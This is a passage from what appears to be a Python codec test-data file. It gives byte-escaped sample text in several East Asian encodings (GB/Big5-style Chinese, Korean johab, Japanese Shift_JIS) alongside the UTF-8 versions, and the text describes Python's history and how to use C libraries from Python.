"\xd3\xef\xd1\xd4\xb5\xc4\xcf\xe0\xb9\xd8\xbc\xbc\xca\xf5\xd5\xfd"
"\xd4\xda\xb7\xc9\xcb\xd9\xb5\xc4\xb7\xa2\xd5\xb9\xa3\xac\xd3\xc3"
"\xbb\xa7\xca\xfd\xc1\xbf\xbc\xb1\xbe\xe7\xc0\xa9\xb4\xf3\xa3\xac"
"\xcf\xe0\xb9\xd8\xb5\xc4\xd7\xca\xd4\xb4\xb7\xc7\xb3\xa3\xb6\xe0"
"\xa1\xa3\x0a\xc8\xe7\xba\xce\xd4\xda\x20\x50\x79\x74\x68\x6f\x6e"
"\x20\xd6\xd0\xca\xb9\xd3\xc3\xbc\xc8\xd3\xd0\xb5\xc4\x20\x43\x20"
"\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xa1\xa1\xd4\xda\xd9\x59\xd3"
"\x8d\xbf\xc6\xbc\xbc\xbf\xec\xcb\xd9\xb0\x6c\xd5\xb9\xb5\xc4\xbd"
"\xf1\xcc\xec\x2c\x20\xe9\x5f\xb0\x6c\xbc\xb0\x9c\x79\xd4\x87\xdc"
"\x9b\xf3\x77\xb5\xc4\xcb\xd9\xb6\xc8\xca\xc7\xb2\xbb\xc8\xdd\xba"
"\xf6\xd2\x95\xb5\xc4\x0a\xd5\x6e\xee\x7d\x2e\x20\x9e\xe9\xbc\xd3"
"\xbf\xec\xe9\x5f\xb0\x6c\xbc\xb0\x9c\x79\xd4\x87\xb5\xc4\xcb\xd9"
"\xb6\xc8\x2c\x20\xce\xd2\x82\x83\xb1\xe3\xb3\xa3\xcf\xa3\xcd\xfb"
"\xc4\xdc\xc0\xfb\xd3\xc3\xd2\xbb\xd0\xa9\xd2\xd1\xe9\x5f\xb0\x6c"
"\xba\xc3\xb5\xc4\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\x81\x4b"
"\xd3\xd0\xd2\xbb\x82\x80\x20\x66\x61\x73\x74\x20\x70\x72\x6f\x74"
"\x6f\x74\x79\x70\x69\x6e\x67\x20\xb5\xc4\x20\x70\x72\x6f\x67\x72"
"\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x20"
"\xbf\xc9\x0a\xb9\xa9\xca\xb9\xd3\xc3\x2e\x20\xc4\xbf\xc7\xb0\xd3"
"\xd0\xd4\x53\xd4\x53\xb6\xe0\xb6\xe0\xb5\xc4\x20\x6c\x69\x62\x72"
"\x61\x72\x79\x20\xca\xc7\xd2\xd4\x20\x43\x20\x8c\x91\xb3\xc9\x2c"
"\x20\xb6\xf8\x20\x50\x79\x74\x68\x6f\x6e\x20\xca\xc7\xd2\xbb\x82"
"\x80\x0a\x66\x61\x73\x74\x20\x70\x72\x6f\x74\x6f\x74\x79\x70\x69"
"\x6e\x67\x20\xb5\xc4\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e"
"\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x2e\x20\xb9\xca\xce\xd2"
"\x82\x83\xcf\xa3\xcd\xfb\xc4\xdc\x8c\xa2\xbc\xc8\xd3\xd0\xb5\xc4"
"\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xc4\xc3\xb5\xbd\x20"
"\x50\x79\x74\x68\x6f\x6e\x20\xb5\xc4\xad\x68\xbe\xb3\xd6\xd0\x9c"
"\x79\xd4\x87\xbc\xb0\xd5\xfb\xba\xcf\x2e\x20\xc6\xe4\xd6\xd0\xd7"
"\xee\xd6\xf7\xd2\xaa\xd2\xb2\xca\xc7\xce\xd2\x82\x83\xcb\xf9\x0a"
"\xd2\xaa\xd3\x91\xd5\x93\xb5\xc4\x86\x96\xee\x7d\xbe\xcd\xca\xc7"
"\x3a\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\xef\xbc\x88\xe6\xb4\xbe\xe6\xa3\xae\xef"
"\xbc\x89\xe8\xaf\xad\xe8\xa8\x80\xe6\x98\xaf\xe4\xb8\x80\xe7\xa7"
"\x8d\xe5\x8a\x9f\xe8\x83\xbd\xe5\xbc\xba\xe5\xa4\xa7\xe8\x80\x8c"
"\xe5\xae\x8c\xe5\x96\x84\xe7\x9a\x84\xe9\x80\x9a\xe7\x94\xa8\xe5"
"\x9e\x8b\xe8\xae\xa1\xe7\xae\x97\xe6\x9c\xba\xe7\xa8\x8b\xe5\xba"
"\x8f\xe8\xae\xbe\xe8\xae\xa1\xe8\xaf\xad\xe8\xa8\x80\xef\xbc\x8c"
"\x0a\xe5\xb7\xb2\xe7\xbb\x8f\xe5\x85\xb7\xe6\x9c\x89\xe5\x8d\x81"
"\xe5\xa4\x9a\xe5\xb9\xb4\xe7\x9a\x84\xe5\x8f\x91\xe5\xb1\x95\xe5"
"\x8e\x86\xe5\x8f\xb2\xef\xbc\x8c\xe6\x88\x90\xe7\x86\x9f\xe4\xb8"
"\x94\xe7\xa8\xb3\xe5\xae\x9a\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d"
"\xe8\xaf\xad\xe8\xa8\x80\xe5\x85\xb7\xe6\x9c\x89\xe9\x9d\x9e\xe5"
"\xb8\xb8\xe7\xae\x80\xe6\x8d\xb7\xe8\x80\x8c\xe6\xb8\x85\xe6\x99"
"\xb0\x0a\xe7\x9a\x84\xe8\xaf\xad\xe6\xb3\x95\xe7\x89\xb9\xe7\x82"
"\xb9\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\xae\x8c\xe6\x88\x90"
"\xe5\x90\x84\xe7\xa7\x8d\xe9\xab\x98\xe5\xb1\x82\xe4\xbb\xbb\xe5"
"\x8a\xa1\xef\xbc\x8c\xe5\x87\xa0\xe4\xb9\x8e\xe5\x8f\xaf\xe4\xbb"
"\xa5\xe5\x9c\xa8\xe6\x89\x80\xe6\x9c\x89\xe7\x9a\x84\xe6\x93\x8d"
"\xe4\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\xe4\xb8\xad\x0a\xe8\xbf\x90"
"\xe8\xa1\x8c\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d\xe8\xaf\xad\xe8"
"\xa8\x80\xe7\xae\x80\xe5\x8d\x95\xe8\x80\x8c\xe5\xbc\xba\xe5\xa4"
"\xa7\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\x90\x84\xe7\xa7\x8d"
"\xe4\xba\xba\xe5\xa3\xab\xe5\xad\xa6\xe4\xb9\xa0\xe4\xbd\xbf\xe7"
"\x94\xa8\xe3\x80\x82\xe7\x9b\xae\xe5\x89\x8d\xef\xbc\x8c\xe5\x9f"
"\xba\xe4\xba\x8e\xe8\xbf\x99\x0a\xe7\xa7\x8d\xe8\xaf\xad\xe8\xa8"
"\x80\xe7\x9a\x84\xe7\x9b\xb8\xe5\x85\xb3\xe6\x8a\x80\xe6\x9c\xaf"
"\xe6\xad\xa3\xe5\x9c\xa8\xe9\xa3\x9e\xe9\x80\x9f\xe7\x9a\x84\xe5"
"\x8f\x91\xe5\xb1\x95\xef\xbc\x8c\xe7\x94\xa8\xe6\x88\xb7\xe6\x95"
"\xb0\xe9\x87\x8f\xe6\x80\xa5\xe5\x89\xa7\xe6\x89\xa9\xe5\xa4\xa7"
"\xef\xbc\x8c\xe7\x9b\xb8\xe5\x85\xb3\xe7\x9a\x84\xe8\xb5\x84\xe6"
"\xba\x90\xe9\x9d\x9e\xe5\xb8\xb8\xe5\xa4\x9a\xe3\x80\x82\x0a\xe5"
"\xa6\x82\xe4\xbd\x95\xe5\x9c\xa8\x20\x50\x79\x74\x68\x6f\x6e\x20"
"\xe4\xb8\xad\xe4\xbd\xbf\xe7\x94\xa8\xe6\x97\xa2\xe6\x9c\x89\xe7"
"\x9a\x84\x20\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xe3\x80"
"\x80\xe5\x9c\xa8\xe8\xb3\x87\xe8\xa8\x8a\xe7\xa7\x91\xe6\x8a\x80"
"\xe5\xbf\xab\xe9\x80\x9f\xe7\x99\xbc\xe5\xb1\x95\xe7\x9a\x84\xe4"
"\xbb\x8a\xe5\xa4\xa9\x2c\x20\xe9\x96\x8b\xe7\x99\xbc\xe5\x8f\x8a"
"\xe6\xb8\xac\xe8\xa9\xa6\xe8\xbb\x9f\xe9\xab\x94\xe7\x9a\x84\xe9"
"\x80\x9f\xe5\xba\xa6\xe6\x98\xaf\xe4\xb8\x8d\xe5\xae\xb9\xe5\xbf"
"\xbd\xe8\xa6\x96\xe7\x9a\x84\x0a\xe8\xaa\xb2\xe9\xa1\x8c\x2e\x20"
"\xe7\x82\xba\xe5\x8a\xa0\xe5\xbf\xab\xe9\x96\x8b\xe7\x99\xbc\xe5"
"\x8f\x8a\xe6\xb8\xac\xe8\xa9\xa6\xe7\x9a\x84\xe9\x80\x9f\xe5\xba"
"\xa6\x2c\x20\xe6\x88\x91\xe5\x80\x91\xe4\xbe\xbf\xe5\xb8\xb8\xe5"
"\xb8\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\x88\xa9\xe7\x94\xa8\xe4\xb8"
"\x80\xe4\xba\x9b\xe5\xb7\xb2\xe9\x96\x8b\xe7\x99\xbc\xe5\xa5\xbd"
"\xe7\x9a\x84\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\xe4\xb8\xa6"
"\xe6\x9c\x89\xe4\xb8\x80\xe5\x80\x8b\x20\x66\x61\x73\x74\x20\x70"
"\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20\x70"
"\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75"
"\x61\x67\x65\x20\xe5\x8f\xaf\x0a\xe4\xbe\x9b\xe4\xbd\xbf\xe7\x94"
"\xa8\x2e\x20\xe7\x9b\xae\xe5\x89\x8d\xe6\x9c\x89\xe8\xa8\xb1\xe8"
"\xa8\xb1\xe5\xa4\x9a\xe5\xa4\x9a\xe7\x9a\x84\x20\x6c\x69\x62\x72"
"\x61\x72\x79\x20\xe6\x98\xaf\xe4\xbb\xa5\x20\x43\x20\xe5\xaf\xab"
"\xe6\x88\x90\x2c\x20\xe8\x80\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20"
"\xe6\x98\xaf\xe4\xb8\x80\xe5\x80\x8b\x0a\x66\x61\x73\x74\x20\x70"
"\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20\x70"
"\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75"
"\x61\x67\x65\x2e\x20\xe6\x95\x85\xe6\x88\x91\xe5\x80\x91\xe5\xb8"
"\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\xb0\x87\xe6\x97\xa2\xe6\x9c\x89"
"\xe7\x9a\x84\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xe6\x8b"
"\xbf\xe5\x88\xb0\x20\x50\x79\x74\x68\x6f\x6e\x20\xe7\x9a\x84\xe7"
"\x92\xb0\xe5\xa2\x83\xe4\xb8\xad\xe6\xb8\xac\xe8\xa9\xa6\xe5\x8f"
"\x8a\xe6\x95\xb4\xe5\x90\x88\x2e\x20\xe5\x85\xb6\xe4\xb8\xad\xe6"
"\x9c\x80\xe4\xb8\xbb\xe8\xa6\x81\xe4\xb9\x9f\xe6\x98\xaf\xe6\x88"
"\x91\xe5\x80\x91\xe6\x89\x80\x0a\xe8\xa6\x81\xe8\xa8\x8e\xe8\xab"
"\x96\xe7\x9a\x84\xe5\x95\x8f\xe9\xa1\x8c\xe5\xb0\xb1\xe6\x98\xaf"
"\x3a\x0a\x0a"),
'johab': (
"\x99\xb1\xa4\x77\x88\x62\xd0\x61\x20\xcd\x5c\xaf\xa1\xc5\xa9\x9c"
"\x61\x0a\x0a\xdc\xc0\xdc\xc0\x90\x73\x21\x21\x20\xf1\x67\xe2\x9c"
"\xf0\x55\xcc\x81\xa3\x89\x9f\x85\x8a\xa1\x20\xdc\xde\xdc\xd3\xd2"
"\x7a\xd9\xaf\xd9\xaf\xd9\xaf\x20\x8b\x77\x96\xd3\x20\xdc\xd1\x95"
"\x81\x20\xdc\xc0\x2e\x20\x2e\x0a\xed\x3c\xb5\x77\xdc\xd1\x93\x77"
"\xd2\x73\x20\x2e\x20\x2e\x20\x2e\x20\x2e\x20\xac\xe1\xb6\x89\x9e"
"\xa1\x20\x95\x65\xd0\x62\xf0\xe0\x20\xe0\x3b\xd2\x7a\x20\x21\x20"
"\x21\x20\x21\x87\x41\x2e\x87\x41\x0a\xd3\x61\xd3\x61\xd3\x61\x20"
"\x88\x41\x88\x41\x88\x41\xd9\x69\x87\x41\x5f\x87\x41\x20\xb4\xe1"
"\x9f\x9a\x20\xc8\xa1\xc5\xc1\x8b\x7a\x20\x95\x61\xb7\x77\x20\xc3"
"\x97\xe2\x9c\x97\x69\xf0\xe0\x20\xdc\xc0\x97\x61\x8b\x7a\x0a\xac"
"\xe9\x9f\x7a\x20\xe0\x3b\xd2\x7a\x20\x2e\x20\x2e\x20\x2e\x20\x2e"
"\x20\x8a\x89\xb4\x81\xae\xba\x20\xdc\xd1\x8a\xa1\x20\xdc\xde\x9f"
"\x89\xdc\xc2\x8b\x7a\x20\xf1\x67\xf1\x62\xf5\x49\xed\xfc\xf3\xe9"
"\x8c\x61\xbb\x9a\x0a\xb5\xc1\xb2\xa1\xd2\x7a\x20\x21\x20\x21\x20"
"\xed\x3c\xb5\x77\xdc\xd1\x20\xe0\x3b\x93\x77\x8a\xa1\x20\xd9\x69"
"\xea\xbe\x89\xc5\x20\xb4\xf4\x93\x77\x8a\xa1\x93\x77\x20\xed\x3c"
"\x93\x77\x96\xc1\xd2\x7a\x20\x8b\x69\xb4\x81\x97\x7a\x0a\xdc\xde"
"\x9d\x61\x97\x41\xe2\x9c\x20\xaf\x81\xce\xa1\xae\xa1\xd2\x7a\x20"
"\xb4\xe1\x9f\x9a\x20\xf1\x67\xf1\x62\xf5\x49\xed\xfc\xf3\xe9\xaf"
"\x82\xdc\xef\x97\x69\xb4\x7a\x21\x21\x20\xdc\xc0\xdc\xc0\x90\x73"
"\xd9\xbd\x20\xd9\x62\xd9\x62\x2a\x0a\x0a",
"\xeb\x98\xa0\xeb\xb0\xa9\xea\xb0\x81\xed\x95\x98\x20\xed\x8e\xb2"
"\xec\x8b\x9c\xec\xbd\x9c\xeb\x9d\xbc\x0a\x0a\xe3\x89\xaf\xe3\x89"
"\xaf\xeb\x82\xa9\x21\x21\x20\xe5\x9b\xa0\xe4\xb9\x9d\xe6\x9c\x88"
"\xed\x8c\xa8\xeb\xaf\xa4\xeb\xa6\x94\xea\xb6\x88\x20\xe2\x93\xa1"
"\xe2\x93\x96\xed\x9b\x80\xc2\xbf\xc2\xbf\xc2\xbf\x20\xea\xb8\x8d"
"\xeb\x92\x99\x20\xe2\x93\x94\xeb\x8e\xa8\x20\xe3\x89\xaf\x2e\x20"
"\x2e\x0a\xe4\xba\x9e\xec\x98\x81\xe2\x93\x94\xeb\x8a\xa5\xed\x9a"
"\xb9\x20\x2e\x20\x2e\x20\x2e\x20\x2e\x20\xec\x84\x9c\xec\x9a\xb8"
"\xeb\xa4\x84\x20\xeb\x8e\x90\xed\x95\x99\xe4\xb9\x99\x20\xe5\xae"
"\xb6\xed\x9b\x80\x20\x21\x20\x21\x20\x21\xe3\x85\xa0\x2e\xe3\x85"
"\xa0\x0a\xed\x9d\x90\xed\x9d\x90\xed\x9d\x90\x20\xe3\x84\xb1\xe3"
"\x84\xb1\xe3\x84\xb1\xe2\x98\x86\xe3\x85\xa0\x5f\xe3\x85\xa0\x20"
"\xec\x96\xb4\xeb\xa6\xa8\x20\xed\x83\xb8\xec\xbd\xb0\xea\xb8\x90"
"\x20\xeb\x8e\x8c\xec\x9d\x91\x20\xec\xb9\x91\xe4\xb9\x9d\xeb\x93"
"\xa4\xe4\xb9\x99\x20\xe3\x89\xaf\xeb\x93\x9c\xea\xb8\x90\x0a\xec"
"\x84\xa4\xeb\xa6\x8c\x20\xe5\xae\xb6\xed\x9b\x80\x20\x2e\x20\x2e"
"\x20\x2e\x20\x2e\x20\xea\xb5\xb4\xec\x95\xa0\xec\x89\x8c\x20\xe2"
"\x93\x94\xea\xb6\x88\x20\xe2\x93\xa1\xeb\xa6\x98\xe3\x89\xb1\xea"
"\xb8\x90\x20\xe5\x9b\xa0\xe4\xbb\x81\xe5\xb7\x9d\xef\xa6\x81\xe4"
"\xb8\xad\xea\xb9\x8c\xec\xa6\xbc\x0a\xec\x99\x80\xec\x92\x80\xed"
"\x9b\x80\x20\x21\x20\x21\x20\xe4\xba\x9e\xec\x98\x81\xe2\x93\x94"
"\x20\xe5\xae\xb6\xeb\x8a\xa5\xea\xb6\x88\x20\xe2\x98\x86\xe4\xb8"
"\x8a\xea\xb4\x80\x20\xec\x97\x86\xeb\x8a\xa5\xea\xb6\x88\xeb\x8a"
"\xa5\x20\xe4\xba\x9e\xeb\x8a\xa5\xeb\x92\x88\xed\x9b\x80\x20\xea"
"\xb8\x80\xec\x95\xa0\xeb\x93\xb4\x0a\xe2\x93\xa1\xeb\xa0\xa4\xeb"
"\x93\x80\xe4\xb9\x9d\x20\xec\x8b\x80\xed\x92\x94\xec\x88\xb4\xed"
"\x9b\x80\x20\xec\x96\xb4\xeb\xa6\xa8\x20\xe5\x9b\xa0\xe4\xbb\x81"
"\xe5\xb7\x9d\xef\xa6\x81\xe4\xb8\xad\xec\x8b\x81\xe2\x91\xa8\xeb"
"\x93\xa4\xec\x95\x9c\x21\x21\x20\xe3\x89\xaf\xe3\x89\xaf\xeb\x82"
"\xa9\xe2\x99\xa1\x20\xe2\x8c\x92\xe2\x8c\x92\x2a\x0a\x0a"),
'shift_jis': (
"\x50\x79\x74\x68\x6f\x6e\x20\x82\xcc\x8a\x4a\x94\xad\x82\xcd\x81"
"\x41\x31\x39\x39\x30\x20\x94\x4e\x82\xb2\x82\xeb\x82\xa9\x82\xe7"
"\x8a\x4a\x8e\x6e\x82\xb3\x82\xea\x82\xc4\x82\xa2\x82\xdc\x82\xb7"
"\x81\x42\x0a\x8a\x4a\x94\xad\x8e\xd2\x82\xcc\x20\x47\x75\x69\x64"
"\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73\x73\x75\x6d\x20\x82\xcd\x8b"
"\xb3\x88\xe7\x97\x70\x82\xcc\x83\x76\x83\x8d\x83\x4f\x83\x89\x83"
"\x7e\x83\x93\x83\x4f\x8c\xbe\x8c\xea\x81\x75\x41\x42\x43\x81\x76"
"\x82\xcc\x8a\x4a\x94\xad\x82\xc9\x8e\x51\x89\xc1\x82\xb5\x82\xc4"
"\x82\xa2\x82\xdc\x82\xb5\x82\xbd\x82\xaa\x81\x41\x41\x42\x43\x20"
"\x82\xcd\x8e\xc0\x97\x70\x8f\xe3\x82\xcc\x96\xda\x93\x49\x82\xc9"
"\x82\xcd\x82\xa0\x82\xdc\x82\xe8\x93\x4b\x82\xb5\x82\xc4\x82\xa2"
"\x82\xdc\x82\xb9\x82\xf1\x82\xc5\x82\xb5\x82\xbd\x81\x42\x0a\x82"
"\xb1\x82\xcc\x82\xbd\x82\xdf\x81\x41\x47\x75\x69\x64\x6f\x20\x82"
"\xcd\x82\xe6\x82\xe8\x8e\xc0\x97\x70\x93\x49\x82\xc8\x83\x76\x83"
"\x8d\x83\x4f\x83\x89\x83\x7e\x83\x93\x83\x4f\x8c\xbe\x8c\xea\x82"
"\xcc\x8a\x4a\x94\xad\x82\xf0\x8a\x4a\x8e\x6e\x82\xb5\x81\x41\x89"
"\x70\x8d\x91\x20\x42\x42\x53\x20\x95\xfa\x91\x97\x82\xcc\x83\x52"
"\x83\x81\x83\x66\x83\x42\x94\xd4\x91\x67\x81\x75\x83\x82\x83\x93"
"\x83\x65\x83\x42\x20\x83\x70\x83\x43\x83\x5c\x83\x93\x81\x76\x82"
"\xcc\x83\x74\x83\x40\x83\x93\x82\xc5\x82\xa0\x82\xe9\x20\x47\x75"
"\x69\x64\x6f\x20\x82\xcd\x82\xb1\x82\xcc\x8c\xbe\x8c\xea\x82\xf0"
"\x81\x75\x50\x79\x74\x68\x6f\x6e\x81\x76\x82\xc6\x96\xbc\x82\xc3"
"\x82\xaf\x82\xdc\x82\xb5\x82\xbd\x81\x42\x0a\x82\xb1\x82\xcc\x82"
"\xe6\x82\xa4\x82\xc8\x94\x77\x8c\x69\x82\xa9\x82\xe7\x90\xb6\x82"
"\xdc\x82\xea\x82\xbd\x20\x50\x79\x74\x68\x6f\x6e\x20\x82\xcc\x8c"
"\xbe\x8c\xea\x90\xdd\x8c\x76\x82\xcd\x81\x41\x81\x75\x83\x56\x83"
"\x93\x83\x76\x83\x8b\x81\x76\x82\xc5\x81\x75\x8f\x4b\x93\xbe\x82"
"\xaa\x97\x65\x88\xd5\x81\x76\x82\xc6\x82\xa2\x82\xa4\x96\xda\x95"
"\x57\x82\xc9\x8f\x64\x93\x5f\x82\xaa\x92\x75\x82\xa9\x82\xea\x82"
"\xc4\x82\xa2\x82\xdc\x82\xb7\x81\x42\x0a\x91\xbd\x82\xad\x82\xcc"
"\x83\x58\x83\x4e\x83\x8a\x83\x76\x83\x67\x8c\x6e\x8c\xbe\x8c\xea"
"\x82\xc5\x82\xcd\x83\x86\x81\x5b\x83\x55\x82\xcc\x96\xda\x90\xe6"
"\x82\xcc\x97\x98\x95\xd6\x90\xab\x82\xf0\x97\x44\x90\xe6\x82\xb5"
"\x82\xc4\x90\x46\x81\x58\x82\xc8\x8b\x40\x94\x5c\x82\xf0\x8c\xbe"
"\x8c\xea\x97\x76\x91\x66\x82\xc6\x82\xb5\x82\xc4\x8e\xe6\x82\xe8"
"\x93\xfc\x82\xea\x82\xe9\x8f\xea\x8d\x87\x82\xaa\x91\xbd\x82\xa2"
"\x82\xcc\x82\xc5\x82\xb7\x82\xaa\x81\x41\x50\x79\x74\x68\x6f\x6e"
"\x20\x82\xc5\x82\xcd\x82\xbb\x82\xa4\x82\xa2\x82\xc1\x82\xbd\x8f"
"\xac\x8d\xd7\x8d\x48\x82\xaa\x92\xc7\x89\xc1\x82\xb3\x82\xea\x82"
"\xe9\x82\xb1\x82\xc6\x82\xcd\x82\xa0\x82\xdc\x82\xe8\x82\xa0\x82"
"\xe8\x82\xdc\x82\xb9\x82\xf1\x81\x42\x0a\x8c\xbe\x8c\xea\x8e\xa9"
"\x91\xcc\x82\xcc\x8b\x40\x94\x5c\x82\xcd\x8d\xc5\x8f\xac\x8c\xc0"
"\x82\xc9\x89\x9f\x82\xb3\x82\xa6\x81\x41\x95\x4b\x97\x76\x82\xc8"
"\x8b\x40\x94\x5c\x82\xcd\x8a\x67\x92\xa3\x83\x82\x83\x57\x83\x85"
"\x81\x5b\x83\x8b\x82\xc6\x82\xb5\x82\xc4\x92\xc7\x89\xc1\x82\xb7"
"\x82\xe9\x81\x41\x82\xc6\x82\xa2\x82\xa4\x82\xcc\x82\xaa\x20\x50"
"\x79\x74\x68\x6f\x6e\x20\x82\xcc\x83\x7c\x83\x8a\x83\x56\x81\x5b"
"\x82\xc5\x82\xb7\x81\x42\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xaf\xe3\x80\x81\x31\x39\x39\x30\x20\xe5\xb9\xb4\xe3\x81"
"\x94\xe3\x82\x8d\xe3\x81\x8b\xe3\x82\x89\xe9\x96\x8b\xe5\xa7\x8b"
"\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3"
"\x81\x99\xe3\x80\x82\x0a\xe9\x96\x8b\xe7\x99\xba\xe8\x80\x85\xe3"
"\x81\xae\x20\x47\x75\x69\x64\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73"
"\x73\x75\x6d\x20\xe3\x81\xaf\xe6\x95\x99\xe8\x82\xb2\xe7\x94\xa8"
"\xe3\x81\xae\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83\xa9\xe3"
"\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e\xe3\x80"
"\x8c\x41\x42\x43\xe3\x80\x8d\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xab\xe5\x8f\x82\xe5\x8a\xa0\xe3\x81\x97\xe3\x81\xa6\xe3"
"\x81\x84\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x81\x8c\xe3\x80"
"\x81\x41\x42\x43\x20\xe3\x81\xaf\xe5\xae\x9f\xe7\x94\xa8\xe4\xb8"
"\x8a\xe3\x81\xae\xe7\x9b\xae\xe7\x9a\x84\xe3\x81\xab\xe3\x81\xaf"
"\xe3\x81\x82\xe3\x81\xbe\xe3\x82\x8a\xe9\x81\xa9\xe3\x81\x97\xe3"
"\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x81"
"\xa7\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a\xe3\x81\x93\xe3\x81"
"\xae\xe3\x81\x9f\xe3\x82\x81\xe3\x80\x81\x47\x75\x69\x64\x6f\x20"
"\xe3\x81\xaf\xe3\x82\x88\xe3\x82\x8a\xe5\xae\x9f\xe7\x94\xa8\xe7"
"\x9a\x84\xe3\x81\xaa\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83"
"\xa9\xe3\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e"
"\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba\xe3\x82\x92\xe9\x96\x8b\xe5"
"\xa7\x8b\xe3\x81\x97\xe3\x80\x81\xe8\x8b\xb1\xe5\x9b\xbd\x20\x42"
"\x42\x53\x20\xe6\x94\xbe\xe9\x80\x81\xe3\x81\xae\xe3\x82\xb3\xe3"
"\x83\xa1\xe3\x83\x87\xe3\x82\xa3\xe7\x95\xaa\xe7\xb5\x84\xe3\x80"
"\x8c\xe3\x83\xa2\xe3\x83\xb3\xe3\x83\x86\xe3\x82\xa3\x20\xe3\x83"
"\x91\xe3\x82\xa4\xe3\x82\xbd\xe3\x83\xb3\xe3\x80\x8d\xe3\x81\xae"
"\xe3\x83\x95\xe3\x82\xa1\xe3\x83\xb3\xe3\x81\xa7\xe3\x81\x82\xe3"
"\x82\x8b\x20\x47\x75\x69\x64\x6f\x20\xe3\x81\xaf\xe3\x81\x93\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe3\x82\x92\xe3\x80\x8c\x50\x79"
"\x74\x68\x6f\x6e\xe3\x80\x8d\xe3\x81\xa8\xe5\x90\x8d\xe3\x81\xa5"
"\xe3\x81\x91\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a"
"\xe3\x81\x93\xe3\x81\xae\xe3\x82\x88\xe3\x81\x86\xe3\x81\xaa\xe8"
"\x83\x8c\xe6\x99\xaf\xe3\x81\x8b\xe3\x82\x89\xe7\x94\x9f\xe3\x81"
"\xbe\xe3\x82\x8c\xe3\x81\x9f\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa8\xad\xe8\xa8\x88\xe3\x81"
"\xaf\xe3\x80\x81\xe3\x80\x8c\xe3\x82\xb7\xe3\x83\xb3\xe3\x83\x97"
"\xe3\x83\xab\xe3\x80\x8d\xe3\x81\xa7\xe3\x80\x8c\xe7\xbf\x92\xe5"
"\xbe\x97\xe3\x81\x8c\xe5\xae\xb9\xe6\x98\x93\xe3\x80\x8d\xe3\x81"
"\xa8\xe3\x81\x84\xe3\x81\x86\xe7\x9b\xae\xe6\xa8\x99\xe3\x81\xab"
"\xe9\x87\x8d\xe7\x82\xb9\xe3\x81\x8c\xe7\xbd\xae\xe3\x81\x8b\xe3"
"\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80"
"\x82\x0a\xe5\xa4\x9a\xe3\x81\x8f\xe3\x81\xae\xe3\x82\xb9\xe3\x82"
"\xaf\xe3\x83\xaa\xe3\x83\x97\xe3\x83\x88\xe7\xb3\xbb\xe8\xa8\x80"
"\xe8\xaa\x9e\xe3\x81\xa7\xe3\x81\xaf\xe3\x83\xa6\xe3\x83\xbc\xe3"
"\x82\xb6\xe3\x81\xae\xe7\x9b\xae\xe5\x85\x88\xe3\x81\xae\xe5\x88"
"\xa9\xe4\xbe\xbf\xe6\x80\xa7\xe3\x82\x92\xe5\x84\xaa\xe5\x85\x88"
"\xe3\x81\x97\xe3\x81\xa6\xe8\x89\xb2\xe3\x80\x85\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x82\x92\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa6"
"\x81\xe7\xb4\xa0\xe3\x81\xa8\xe3\x81\x97\xe3\x81\xa6\xe5\x8f\x96"
"\xe3\x82\x8a\xe5\x85\xa5\xe3\x82\x8c\xe3\x82\x8b\xe5\xa0\xb4\xe5"
"\x90\x88\xe3\x81\x8c\xe5\xa4\x9a\xe3\x81\x84\xe3\x81\xae\xe3\x81"
"\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\x50\x79\x74\x68\x6f\x6e"
"\x20\xe3\x81\xa7\xe3\x81\xaf\xe3\x81\x9d\xe3\x81\x86\xe3\x81\x84"
